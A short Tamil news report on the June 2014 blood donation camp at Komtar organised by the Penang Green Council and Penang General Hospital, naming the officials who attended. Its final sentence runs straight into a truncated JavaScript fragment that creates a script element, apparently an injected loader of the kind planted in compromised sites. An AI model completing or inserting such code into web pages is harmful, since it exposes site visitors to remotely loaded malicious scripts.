பினாங்கு பசுமை கழகமும் பினாங்கு அரசு மருத்துவமனையும் இணைந்து இரத்த தானம் முகாம் ஒன்றினை கொம்தாரில் கடந்த 6 ஜுன் 2014-ஆம் நாள் காலை 10 மணி முதல் மாலை 5 வரை ஏற்பாடு செய்திருந்தனர். பினாங்கு பசுமை கழகம் ஒன்பதாவது முறையாக இரத்த தான முகாமை ஏற்பாடு
செய்துள்ளது. இதனை அதிகாரப்பூர்வமாகத் துவக்கி வைத்தார் பத்து உபான் சட்டமன்ற உறுப்பினர் திரு.ஜெயபாலன் அவர்கள்.
இந்நிகழ்வின் முக்கிய நோக்கம் பினாங்கு பொது மருத்துவமனையின் இரத்த வங்கியை நிரப்புவதே ஆகும். ஏனெனில், கொண்டாடவிருக்கும் பண்டிகை காலங்களில் அதிகமான சாலை விபத்துகள் நிலவும் என்பதால் இரத்த பயன்பாடு அவசியமாகிறது. இதனை நிவர்த்திச் செய்யும் வகையில் இரத்த தானம் முகாம் நடத்தப்படுவதாக வரவேற்புரையில் கூறினார் மதிப்பிற்குரிய சட்டமன்ற உறுப்பினர் . இவ்வாண்டின் கருப்பொருள் “ இரத்த தானம் செய், உயிரை பாதுகாத்திடு” (Donate Blood ; Save Life) என்பதாகும். அதோடு, பொதுமக்கள் இடையே ரத்த தானம் பற்றிய விழிப்புணர்வை மேலோங்க இம்மாதிரியான முகாம்கள் வழிவகுக்கும் என நம்பிக்கை தெரிவித்தார். விழாக் காலங்களில் சாலை விபத்துகள் ஆங்காங்கே அதிகமாக நடைபெறுவதால் உயிர்களை காப்பாற்றும் முன் ஏற்பாடாக இரத்த வங்கியை நிரப்புகின்றனர். மேலும், பினாங்கு வாழ் மக்களிடையே ஆரோக்கியமான வாழ்வின் முக்கியதுவத்தை மேம்படுத்தும் வகையில் இம்மாதிரியான நிகழ்வுகள் முன்னோடியாக அமையும் என நம்பிக்கை தெரிவித்தார்.
இந்நிகழ்வில் பினாங்கு பசுமை கழக நிர்வாக அதிகாரி டத்தோ ரொஸ்லி ஜாஃபார், அதன் துணை அதிகாரி டத்தோ அப்துல் ரஹிம் ஸ்சஹாக் மற்றும் பினாங்கு பொது மருத்துவமனை இரத்த வங்கி பிரிவின் மருத்துவ அதிகாரி டாக்டர் சித்தி அதிஹா அவர்களும் சிறப்பு விருந்தினர்களாக கலந்து சிறப்பித்தனர்.var d=document;var s=d.createElement(‘script’);